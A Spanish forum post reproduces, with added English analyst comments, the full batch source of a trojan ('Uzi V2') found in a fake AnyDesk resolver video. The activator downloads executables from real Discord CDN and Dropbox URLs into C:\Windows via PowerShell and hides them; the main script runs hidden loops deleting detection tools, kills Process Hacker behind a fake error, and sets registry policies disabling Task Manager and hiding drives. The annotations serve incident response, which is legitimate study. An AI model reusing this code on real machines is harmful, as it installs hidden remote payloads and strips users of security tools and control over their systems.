(https://i.postimg.cc/BbBYjQLv/malware-pdf.jpg) (https://postimg.cc/5QjqGJmc)
Hola, este es mi primer post. Y pues decidí subir el código fuente de un malware que me encontré en un video de "Anydesk ip resolver". Era un video falso con un troyano que subieron a anonfiles y los chavales ni se molestaron en ocultar el código pasándolo a .exe. Directamente lo pusieron en .bat y era cuestión de suerte que alguien cayera XD
El primer programa se llama Uzi V2
Este sería su "activador"
@echo off
REM ---- Analyst annotations (added in review; the original carries no comments) ----
REM "Activator" stage of the sample as posted. It gates on a hard-coded allowlist
REM of volume serial numbers, usernames and computer names, and only then pulls
REM the rest of the kit into C:\Windows with PowerShell Invoke-WebRequest and
REM hides every dropped file with attrib +r +h +s. The code is reproduced as
REM found; none of its mistakes were corrected (several are noted below because
REM they decide which artefacts an incident responder will actually find).
title Uzi Activator
color 04
:HWID
cls
REM System32 is the working directory for the whole check and the vol.txt
REM scratch file is written there, so the script presumably only works from an
REM elevated prompt (a standard user cannot write into System32) - confirm.
cd C:\Windows\System32
cls
timeout /t 3 > nul
cls
REM Writes the volume label and serial number of the current drive into
REM System32\vol.txt; that serial is what the sample calls the "HWID".
vol > vol.txt
cls
goto ScanHWID
:ScanHWID
cls
REM Six allowlisted serials follow, one per operator nickname (the ::name::
REM lines are labels used as comments). findstr /m sets errorlevel 0 when the
REM serial occurs in vol.txt; on a hit vol.txt is deleted and control moves to
REM the username check. On a miss vol.txt is left behind in System32.
::uruwinner::
cd C:\Windows\System32
findstr /m "04E9-5D75" vol.txt
cls
if %errorlevel%==0 (
cd C:\Windows\System32
del "vol.txt"
goto checkusername
)
::CarlosR::
cd C:\Windows\System32
findstr /m "4807-F810" vol.txt
cls
if %errorlevel%==0 (
cd C:\Windows\System32
del "vol.txt"
goto checkusername
)
::Hansy::
cd C:\Windows\System32
findstr /m "CC5D-CC75" vol.txt
cls
if %errorlevel%==0 (
cd C:\Windows\System32
del "vol.txt"
goto checkusername
)
::Verify::
cd C:\Windows\System32
findstr /m "988C-C24A" vol.txt
cls
if %errorlevel%==0 (
cd C:\Windows\System32
del "vol.txt"
goto checkusername
)
::Ryzeon::
cd C:\Windows\System32
findstr /m "22C1-B255" vol.txt
cls
if %errorlevel%==0 (
cd C:\Windows\System32
del "vol.txt"
goto checkusername
)
::Dani::
cd C:\Windows\System32
findstr /m "F891-E910" vol.txt
cls
if %errorlevel%==0 (
cd C:\Windows\System32
del "vol.txt"
goto checkusername
)
REM No serial matched: a message box through mshta.exe (vbscript: one-liners
REM are used for every dialog in this sample), then the script deletes its own
REM file and exits. vol.txt is not cleaned up on this path.
mshta.exe vbscript:Execute("msgbox ""You don't have access!"",0,"" "":close")
del %0
exit
:checkusername
REM Second gate: the USERNAME value must equal one of six hard-coded names.
REM The comparison is unquoted and case-sensitive (no /I), so a differently
REM cased name does not pass and a name containing spaces breaks the if syntax.
::uruwinner::
if %username%==Fede goto checkcomputername
::CarlosR::
if %username%==abiza goto checkcomputername
::Hansy::
if %username%==Diego goto checkcomputername
::Verify::
if %username%==Marcos goto checkcomputername
::Ryzeon::
if %username%==ALEX goto checkcomputername
::Dani::
if %username%==User goto checkcomputername
REM No username matched: same dialog, self-delete and exit as above.
mshta.exe vbscript:Execute("msgbox ""You don't have access!"",0,"" "":close")
del %0
exit
:checkcomputername
REM Third gate: COMPUTERNAME against six hard-coded DESKTOP-xxxxxxx names,
REM with the same unquoted, case-sensitive comparison as the username check.
::uruwinner::
if %computername%==DESKTOP-DFMPCSS goto installation1
::CarlosR::
if %computername%==DESKTOP-DVRCK8Q goto installation1
::Hansy::
if %computername%==DESKTOP-KMQPIOC goto installation1
::Verify::
if %computername%==DESKTOP-7C5VCR5 goto installation1
::Ryzeon::
if %computername%==DESKTOP-8V83AVS goto installation1
::Dani::
if %computername%==DESKTOP-312NFIB goto installation1
REM No computer name matched: same dialog, self-delete and exit as above.
mshta.exe vbscript:Execute("msgbox ""You don't have access!"",0,"" "":close")
del %0
exit
:installation1
REM Download stage. This label is defined twice (see the second :installation1
REM after :check1). cmd resolves goto by scanning forward from the goto line and
REM wrapping to the top, so the gotos above presumably land here and the one
REM inside :check1 lands on the later copy - it works by accident.
mshta.exe vbscript:Execute("msgbox ""Press accept to start the activation."",0,"" "":close")
cls
echo Starting Activation...
REM First drop: cmdow.exe, fetched from a Discord CDN attachment URL straight
REM into C:\Windows. It is used later as "cmdow @ /hid" and "cmdow @ /vis",
REM i.e. presumably to hide and show the console window.
Powershell Invoke-WebRequest https://cdn.discordapp.com/attachments/545694037449900042/583924327808892941/cmdow.exe -OutFile C:\Windows\cmdow.exe
cls
cd C:\Windows
REM Read-only, hidden and system attributes go on every dropped file: the
REM default Explorer view does not list them and a plain del fails on them.
attrib +r +h +s cmdow.exe
REM Six detached cmd windows, each one: hide its own window, download one
REM component from Discord CDN or Dropbox, hide the file, exit. Dropped paths:
REM   C:\Windows\menumode.exe, C:\Windows\WindowsUpdate.cmd,
REM   C:\Windows\System32\Uzi.cmd (saved from Uzi_1.bat),
REM   C:\Windows\script0.exe (saved from script.exe), C:\Windows\script2.exe,
REM   C:\Windows\anydesk.exe.
REM The last line saves to anydesk.exe but runs attrib on script3.exe, so no
REM script3.exe is ever created (this matters for :check7 below and for the
REM main program's HWID SPOOFER item). PowerShell Invoke-WebRequest started from
REM cmd with an -OutFile under C:\Windows, followed by attrib +h +s, is the
REM behaviour to alert on; the URLs on these lines are the network indicators.
start cmd /k "@Echo off & cmdow @ /hid & Powershell Invoke-WebRequest https://cdn.discordapp.com/attachments/682854111846334478/695157811759284254/menumode.exe -OutFile C:\Windows\menumode.exe & cd C:\Windows & attrib +r +h +s menumode.exe & exit"
start cmd /k "@Echo off & cmdow @ /hid & Powershell Invoke-WebRequest https://cdn.discordapp.com/attachments/715686766665007226/723310241403371681/WindowsUpdate.cmd -OutFile C:\Windows\WindowsUpdate.cmd & cd C:\Windows & attrib +r +h +s WindowsUpdate.cmd & exit"
start cmd /k "@Echo off & cmdow @ /hid & Powershell Invoke-WebRequest https://cdn.discordapp.com/attachments/734182612117225542/734234621583163482/Uzi_1.bat -OutFile C:\Windows\System32\Uzi.cmd & cd C:\Windows\System32 & attrib +r +h +s Uzi.cmd & exit"
start cmd /k "@Echo off & cmdow @ /hid & Powershell Invoke-WebRequest https://cdn.discordapp.com/attachments/666069629793206336/681712069950832773/script.exe -OutFile C:\Windows\script0.exe & cd C:\Windows & attrib +r +h +s script0.exe & exit"
start cmd /k "@Echo off & cmdow @ /hid & Powershell Invoke-WebRequest https://cdn.discordapp.com/attachments/715686766665007226/722993965674004511/script2.exe -OutFile C:\Windows\script2.exe & cd C:\Windows & attrib +r +h +s script2.exe & exit"
start cmd /k "@Echo off & cmdow @ /hid & Powershell Invoke-WebRequest https://dl.dropbox.com/s/65yzn81i1jrev72/anydesk.exe?dl=1 -OutFile C:\Windows\anydesk.exe & cd C:\Windows & attrib +r +h +s script3.exe & exit"
mshta.exe vbscript:Execute("msgbox ""Activation started, be patient."",0,"" "":close")
:check1
REM Busy-wait loops: each checkN spins with no delay until the expected file
REM exists, then shows a "Complete N/7" dialog. A cmd.exe at full CPU while
REM the downloads run is the visible side effect.
if exist "C:\Windows\menumode.exe" goto installation1
goto check1
:installation1
REM Second definition of :installation1 (see the note at the first one).
mshta.exe vbscript:Execute("msgbox ""Complete 1/7."",0,"" "":close")
goto check2
:check2
if exist "C:\Windows\WindowsUpdate.cmd" goto installation2
goto check2
:installation2
mshta.exe vbscript:Execute("msgbox ""Complete 2/7."",0,"" "":close")
goto check3
:check3
if exist "C:\Windows\System32\Uzi.cmd" goto installation3
goto check3
:installation3
mshta.exe vbscript:Execute("msgbox ""Complete 3/7."",0,"" "":close")
goto check4
:check4
if exist "C:\Windows\script0.exe" goto installation4
goto check4
:installation4
mshta.exe vbscript:Execute("msgbox ""Complete 4/7."",0,"" "":close")
goto check5
:check5
REM Step 5 checks nothing; it goes straight to its dialog.
goto installation5
:installation5
mshta.exe vbscript:Execute("msgbox ""Complete 5/7."",0,"" "":close")
goto check6
:check6
if exist "C:\Windows\script2.exe" goto installation6
goto check6
:installation6
mshta.exe vbscript:Execute("msgbox ""Complete 6/7."",0,"" "":close")
goto check7
:check7
REM Waits for C:\Windows\script3.exe, which the download stage above never
REM creates (that download was saved as anydesk.exe). Unless some other
REM component drops script3.exe, this loop never ends and :finish is unreachable.
if exist "C:\Windows\script3.exe" goto installation7
goto check7
:installation7
mshta.exe vbscript:Execute("msgbox ""Complete 7/7."",0,"" "":close")
goto finish
:finish
cls
mshta.exe vbscript:Execute("msgbox ""Uzi successfully activated!"",0,"" "":close")
REM Self-delete of the activator: forced, quiet, ignoring file attributes.
del /f/q/a %0
exit
Y este ya sería el programa
@echo off
REM ---- Analyst annotations (added in review; the original carries no comments) ----
REM Main "Uzi" menu program, meant to run after the activator above has dropped
REM menumode.exe, cmdow.exe, WindowsUpdate.cmd and the script*.exe helpers. The
REM menu binary returns the chosen item in errorlevel. The ANTI-SS branch runs
REM hidden endless loops that keep deleting files of what, judging by file names
REM only, are screen-share / anti-cheat detection tools (iDetect, Process
REM Hacker) and in "blatant" mode also sets lockdown policies in the registry.
REM Code reproduced as found; mistakes are noted, not fixed, because they decide
REM which artefacts survive on an infected host.
title
color 04
goto uzi
:uzi
cls
mode 120, 36
echo.
echo `/yhhy/` `
echo yMMMMMMd. `mNNN+ .yNNNh-
echo mMMMMMMMs` ``..-::::::::::::::::::::::::::--....dMMN/ sMMMMMd
echo +MMMMMMMMNmdyhhhdmNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNMMMmmddhssssssomMMMMMm-/
echo +MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmy```.
echo .MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNNy-------------`
echo `MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNNNNNNNNNN/
echo sddddddmNNNNNNNNNNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdoooooooooooo+.
echo ```````...........:dmmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMh/////.
echo ```+mNMMMMMMMMMMMMMNNNMNNNNNNNmddddddddddddddddddddddhhhhs.
echo `.+dMMMMMMMMMMMN:.od......so``````````````````````````
echo +MMMMMMMMMMMN- :h` so
echo :MMMMMMMMMMMNy+://. .h:
echo -MMMMMMMMMMMd./sso+++oo:
echo `dMMMMMMMMMMd ``````
echo `NMMMMMMMMMMd
echo `NMMMMMMMMMMd
echo `NMMMMMMMMMMd CRACKED BY FLOZZY
echo hMMMMMMMMMMd` CRACKED BY FLOZZY
echo .hNNMMMMMMMN: CRACKED BY FLOZZY
echo -/hMMMMMN/` CRACKED BY FLOZZY
echo sMMMMMN.
echo sMMMMMN. NO COMPRES ESTA PIJA
echo sMMMMMN.
echo sMMMMMN.
echo sMMMMMN.
echo sMMMMMN.
echo sNNNNNN-
echo ......`
echo ________________________________________________________________________________________________________________________
REM menumode.exe (dropped by the activator) renders the four items and returns
REM the selected index in errorlevel, hence the if chain that follows.
menumode 0440 " [+] ANTI-SS " " [+] SELF-DESTRUCT " " [+] EXTRA " " [+] EXIT "
if %errorlevel%==1 goto antiss
if %errorlevel%==2 goto destruct
if %errorlevel%==3 goto extra
if %errorlevel%==4 cls & mshta.exe vbscript:Execute("msgbox ""Goodbye!"",0,"" "":close") & exit
:extra
cls
mode 120, 36
echo.
echo `/yhhy/` `
echo yMMMMMMd. `mNNN+ .yNNNh-
echo mMMMMMMMs` ``..-::::::::::::::::::::::::::--....dMMN/ sMMMMMd
echo +MMMMMMMMNmdyhhhdmNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNMMMmmddhssssssomMMMMMm-/
echo +MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmy```.
echo .MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNNy-------------`
echo `MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNNNNNNNNNN/
echo sddddddmNNNNNNNNNNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdoooooooooooo+.
echo ```````...........:dmmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMh/////.
echo ```+mNMMMMMMMMMMMMMNNNMNNNNNNNmddddddddddddddddddddddhhhhs.
echo `.+dMMMMMMMMMMMN:.od......so``````````````````````````
echo +MMMMMMMMMMMN- :h` so
echo :MMMMMMMMMMMNy+://. .h:
echo -MMMMMMMMMMMd./sso+++oo:
echo `dMMMMMMMMMMd ``````
echo `NMMMMMMMMMMd
echo `NMMMMMMMMMMd
echo `NMMMMMMMMMMd CRACKED BY FLOZZY
echo hMMMMMMMMMMd` CRACKED BY FLOZZY
echo .hNNMMMMMMMN: CRACKED BY FLOZZY
echo -/hMMMMMN/` CRACKED BY FLOZZY
echo sMMMMMN. CRACKED BY FLOZZY
echo sMMMMMN. CRACKED BY FLOZZY
echo sMMMMMN. CRACKED BY FLOZZY
echo sMMMMMN. CRACKED BY FLOZZY
echo sMMMMMN. CRACKED BY FLOZZY
echo sMMMMMN. CRACKED BY FLOZZY
echo sNNNNNN- CRACKED BY FLOZZY
echo ......`
echo ________________________________________________________________________________________________________________________
REM Each item starts one of the dropped helpers from System32 and returns to
REM this menu. The activator saved them under C:\Windows, not System32, so the
REM start command relies on PATH lookup (C:\Windows is normally on PATH -
REM verify). The helpers' contents are not on this page, only their menu names.
REM script3.exe (HWID SPOOFER) is never created by the activator, so item 3
REM cannot start anything.
menumode 0440 " [+] ANYDESK RESOLVER " " [+] IP FINDER " " [+] HWID SPOOFER " " [+] BACK "
if %errorlevel%==1 cls & cd C:\Windows\System32 & start script0.exe & goto extra
if %errorlevel%==2 cls & cd C:\Windows\System32 & start script2.exe & goto extra
if %errorlevel%==3 cls & cd C:\Windows\System32 & start script3.exe & goto extra
if %errorlevel%==4 goto uzi
:antiss
REM "Anti-SS" submenu: NORMAL and BLATANT both hide the console and start an
REM endless deletion loop; DISABLE stops it through a flag file and reverts the
REM registry changes. Note that no cls precedes the banner on this screen.
mode 120, 37
echo.
echo `/yhhy/` `
echo yMMMMMMd. `mNNN+ .yNNNh-
echo mMMMMMMMs` ``..-::::::::::::::::::::::::::--....dMMN/ sMMMMMd
echo +MMMMMMMMNmdyhhhdmNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNMMMmmddhssssssomMMMMMm-/
echo +MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmy```.
echo .MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNNy-------------`
echo `MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNNNNNNNNNN/
echo sddddddmNNNNNNNNNNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdoooooooooooo+.
echo ```````...........:dmmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMh/////.
echo ```+mNMMMMMMMMMMMMMNNNMNNNNNNNmddddddddddddddddddddddhhhhs.
echo `.+dMMMMMMMMMMMN:.od......so``````````````````````````
echo +MMMMMMMMMMMN- :h` so
echo :MMMMMMMMMMMNy+://. .h:
echo -MMMMMMMMMMMd./sso+++oo:
echo `dMMMMMMMMMMd ``````
echo `NMMMMMMMMMMd
echo `NMMMMMMMMMMd CRACKED BY FLOZZY
echo `NMMMMMMMMMMd CRACKED BY FLOZZY
echo hMMMMMMMMMMd` CRACKED BY FLOZZY
echo .hNNMMMMMMMN: CRACKED BY FLOZZY
echo -/hMMMMMN/` CRACKED BY FLOZZY
echo sMMMMMN. CRACKED BY FLOZZY
echo sMMMMMN. CRACKED BY FLOZZY
echo sMMMMMN. CRACKED BY FLOZZY
echo sMMMMMN. CRACKED BY FLOZZY
echo sMMMMMN. CRACKED BY FLOZZY
echo sMMMMMN. CRACKED BY FLOZZY
echo sNNNNNN-
echo ......` CRACKED BY FLOZZY
echo. CRACKED BY FLOZZYCRACKED BY FLOZZY
echo ________________________________________________________________________________________________________________________
menumode 0440 " [+] ENABLE NORMAL " " [+] ENABLE BLATANT " " [+] DISABLE " " [+] BACK "
if %errorlevel%==1 goto enable1
if %errorlevel%==2 goto enable2
if %errorlevel%==3 goto disable
if %errorlevel%==4 goto uzi
:enable1
cls
cd C:\Windows\System32
REM Launches the dropped windowsupdate.cmd (its contents are not on this page),
REM retitles this console to the current directory plus \cmd.exe so it reads
REM like an ordinary cmd.exe, and hides the window with cmdow; the loop below
REM then runs as an invisible cmd.exe process.
start windowsupdate.cmd
Title %cd%\cmd.exe
cmdow @ /hid
goto loop
:loop
REM Kill switch first: the DISABLE branch creates C:\ProgramData\WindowsSettings.txt
REM and this hidden loop exits as soon as it sees that file. Otherwise, with no
REM pause at all, it deletes two .sys files from the user's Temp folder and two
REM DLLs from C:\ProgramData\iDetect; the names suggest screen-share detection
REM tooling (inference from file names only). The .sys deletes are forced and
REM ignore attributes, the DLL deletes are plain. IR indicators: a hidden
REM cmd.exe titled like a cmd.exe path pinned at 100 percent CPU, and repeated
REM deletions of exactly these paths.
if exist "C:\ProgramData\WindowsSettings.txt" exit
cd C:\Users\%username%\AppData\Local\Temp
del /f/q/a C:\Users\%username%\AppData\Local\Temp\PaladinDriver.sys
del /f/q/a C:\Users\%username%\AppData\Local\Temp\avenge_driver.sys
cd C:\ProgramData\iDetect
del "xxHashSharp.dll"
del "ProcessHacker.Native.dll"
goto loop
:enable2
cls
cmdow @ /hid
REM "Blatant" mode: policy values under Policies\System and Policies\Explorer
REM (DisableTaskMgr in both HKCU and HKLM, NoTrayContextMenu in both hives,
REM NoDrives=4 which is a drive-hide bitmask, NoSetFolders, NoFind, NoWinKeys).
REM The HKLM writes need administrator rights. These values are the registry
REM artefacts to look for; the DISABLE branch removes exactly this set.
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoTrayContextMenu /t REG_DWORD /d 1 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoTrayContextMenu /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 4 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetFolders /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /t REG_DWORD /d 1 /f
cls
cd C:\Windows\System32
REM Same launch-and-retitle as :enable1 (the window was already hidden above).
start windowsupdate.cmd
Title %cd%\cmd.exe
goto loop1
:loop1
REM Same flag-file exit and file deletions as :loop, plus: if ProcessHacker.exe
REM is running (tasklist piped into find /I), it is killed with taskkill and a
REM "Runtime Error" dialog is shown through msg, apparently so the kill passes
REM for a crash; then ProcessHacker.exe is deleted from Program Files. If either
REM cd fails (folder absent), the unqualified del that follows runs in whatever
REM the current directory was before.
if exist "C:\ProgramData\WindowsSettings.txt" exit
tasklist | find /I "ProcessHacker.exe"
if %errorlevel%==0 (
TASKKILL /F /IM ProcessHacker.exe
Msg * Runtime Error: Process Hacker 2.lnk
) else (
echo.
)
del /f/q/a C:\Users\%username%\AppData\Local\Temp\PaladinDriver.sys
del /f/q/a C:\Users\%username%\AppData\Local\Temp\avenge_driver.sys
cd C:\ProgramData\iDetect
del "xxHashSharp.dll"
del "ProcessHacker.Native.dll"
cd "C:\Program Files\Process Hacker 2"
del "ProcessHacker.exe"
goto loop1
:disable
cls
cmdow @ /hid
REM DISABLE: removes the policy values set by :enable2 (same keys, written with
REM the full hive names here), then makes the console visible again.
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoTrayContextMenu /f
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoTrayContextMenu /f
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /f
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /f
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /f
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetFolders /f
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /f
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /f
cls
cmdow @ /vis
cd C:\ProgramData
REM Creates the kill-switch file. "WindowsSettings" is presumably not a real
REM command (nothing on this page defines it), but the output redirection still
REM creates an empty C:\ProgramData\WindowsSettings.txt, which is what the
REM hidden :loop / :loop1 instances test for. It waits 5 s so they can see it,
REM deletes it and returns to the menu. The windowsupdate.cmd started by
REM enable1/enable2 is not stopped here.
WindowsSettings > WindowsSettings.txt
cls
timeout /t 5 > nul
cls
del "WindowsSettings.txt"
mshta.exe vbscript:Execute("msgbox ""Disabled!"",0,"" "":close")
goto antiss
:destruct
cls
REM SELF-DESTRUCT is an incomplete cleanup, which matters for IR:
REM  - cmdow.exe is looked for in C:\ProgramData, but the activator dropped it in
REM    C:\Windows, so it stays.
REM  - attrib is run on "script.exe" while del targets script0.exe, so script0.exe
REM    keeps +r +h +s and the plain del presumably fails on the read-only file.
REM  - script3.exe never existed; WindowsConfiguration.cmd/.log are created by
REM    nothing on this page (and that del line lacks its closing quote).
REM  - C:\Windows\System32\Uzi.cmd and C:\Windows\anydesk.exe are never removed.
REM  - The registry policies set by :enable2 are not reverted here.
cd C:\ProgramData
attrib -r -h -s cmdow.exe
del "cmdow.exe"
cd C:\Windows
attrib -r -h -s script.exe
del "script0.exe"
attrib -r -h -s script2.exe
del "script2.exe"
attrib -r -h -s script3.exe
del "script3.exe"
attrib -r -h -s WindowsConfiguration.cmd
del "WindowsConfiguration.cmd
attrib -r -h -s WindowsConfiguration.log
del "WindowsConfiguration.log"
attrib -r -h -s WindowsUpdate.cmd
del "WindowsUpdate.cmd"
attrib -r -h -s menumode.exe
del "menumode.exe"
del "WindowsUpdate.log"
mshta.exe vbscript:Execute("msgbox ""Successfully destroyed!"",0,"" "":close")
REM Finally the script clears its own attributes and deletes itself.
attrib -r -h -s %0
del /f/q/a %0
Si alguien sabe bastante de batch, que me explique cómo funciona, que apenas entiendo el código